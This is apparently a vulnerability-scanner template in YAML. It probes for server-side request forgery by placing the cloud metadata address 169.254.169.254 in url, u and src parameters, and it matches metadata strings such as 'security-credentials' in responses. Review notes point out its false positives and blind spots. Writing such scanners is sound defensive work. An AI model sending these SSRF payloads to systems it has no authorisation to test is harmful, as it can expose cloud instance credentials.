# Scanner template: sends three GET requests that place the cloud metadata
# address (169.254.169.254) in a URL-type query parameter, and reports a
# finding when the response body contains metadata-looking strings.
#
# Limitations:
#   - Only reflected responses are detected (see the NOTE in description).
#   - NOTE(review): metadata services that require a session token or a
#     special request header (e.g. AWS IMDSv2) will presumably not answer
#     these plain GETs, so a clean result does not show the parameter is
#     safe. Confirm against the target's metadata-service settings.
id: xpl-ssrf-basic
info:
  name: "Server-Side Request Forgery (basic reflection)"
  author: imtaqin
  severity: high
  description: |
    Checks for reflection of internal metadata endpoints in response
    bodies via common SSRF-prone parameters.
    NOTE: blind SSRF requires OOB (cloud tier).
  tags:
    - ssrf

# TODO(backend): swap http://169.254.169.254 for {{interactsh-url}} when
# the cloud OOB server is enabled; correlate DNS/HTTP callbacks.

http:
  - method: GET
    # One request per entry; the parameter names probed are url, u and src.
    path:
      - "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/"
      - "{{BaseURL}}/proxy?u=http://169.254.169.254/latest/meta-data/"
      - "{{BaseURL}}/image?src=http://169.254.169.254/"
    # Either matcher below is enough to raise the finding.
    matchers-condition: or
    matchers:
      # Any single word is sufficient (condition: or).
      # NOTE(review): a token such as "instance-id" can also occur in
      # ordinary page content, and no status code or content-type check
      # narrows the match, so confirm a hit manually before reporting it
      # at high severity.
      - type: word
        part: body
        words:
          - "ami-id"
          - "instance-id"
          - "security-credentials"
        condition: or
        name: aws-metadata-reflected
      # Case-insensitive alternation of two tokens.
      # NOTE(review): "project-id" is generic and may match unrelated
      # pages. The request paths above use the /latest/meta-data/ layout
      # or the bare root; confirm that a GCP metadata service answers
      # them with text this regex matches.
      - type: regex
        part: body
        regex:
          - "(?i)computeMetadata|project-id"
        name: gcp-metadata-reflected